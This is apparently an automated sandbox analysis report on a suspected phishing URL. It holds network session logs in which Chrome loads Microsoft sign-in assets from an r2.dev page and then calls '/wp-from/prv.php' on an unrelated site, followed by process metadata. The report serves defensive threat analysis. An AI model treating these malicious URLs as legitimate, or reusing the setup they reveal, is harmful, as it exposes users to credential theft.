2024-05-23 22:29:18 UTC	1369	IN	Data Raw: 36 2e 37 36 35 56 39 35 2e 32 34 33 37 48 31 30 33 2e 32 35 32 56 37 31 2e 31 39 32 39 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 36 45 43 43 45 35 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 37 2e 30 38 37 20 37 35 2e 36 33 35 48 31 34 32 2e 31 37 37 56 37 39 2e 37 33 37 39 48 31 33 37 2e 30 38 37 56 37 35 2e 36 33 35 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 39 2e 38 35 32 20 37 35 2e 36 33 35 48 31 33 34 2e 39 33 34 56 37 39 2e 37 33 37 39 48 Data Ascii: 6.765V95.2437H103.252V71.1929Z" fill="#6ECCE5" /> <path d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	2.18.97.153	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:18 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 22:29:18 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=236342 Date: Thu, 23 May 2024 22:29:18 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-23 22:29:18 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	13.107.213.67	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:18 UTC	418	OUT	GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:18 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:18 GMT Content-Type: image/svg+xml Content-Length: 621 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT ETag: 0x8D8852A7FA6B761 x-ms-request-id: ace7413e-901e-0033-6848-adb989000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240523T222918Z-16f669959b4gz86b1uee05t9pw000000057g000000005x5x x-fd-int-roxy-purgeid: 4554691 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-05-23 22:29:18 UTC	621	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=\|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	152.199.23.37	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:19 UTC	419	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:19 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 5166653 Cache-Control: public, max-age=31536000 Content-MD5: DhdidjYrlCeaRJJRG/y9mA== Content-Type: image/svg+xml Date: Thu, 23 May 2024 22:29:19 GMT Etag: 0x8D7B007297AE131 Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT Server: ECAcc (lhd/35BE) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 5c9954f4-701e-0084-7f63-7ea17b000000 x-ms-version: 2009-09-19 Content-Length: 1864 Connection: close
2024-05-23 22:29:19 UTC	1864	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	148.72.158.229	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:20 UTC	365	OUT	GET /wp-from/prv.php HTTP/1.1 Host: c2millwrightmachineshop.ca Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:20 UTC	383	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:20 GMT Server: Apache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Headers: x-test-header, Origin, X-Requested-With, Content-Type, Accept Referrer-Policy: no-referrer-when-downgrade Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5356, Parent PID: 2764

General

Target ID:	0
Start time:	18:29:07
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3452, Parent PID: 5356

General

Target ID:	2
Start time:	18:29:10
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2212,i,1600881696001814177,16701260416799824026,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6532, Parent PID: 2764

General

Target ID:	3
Start time:	18:29:12
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly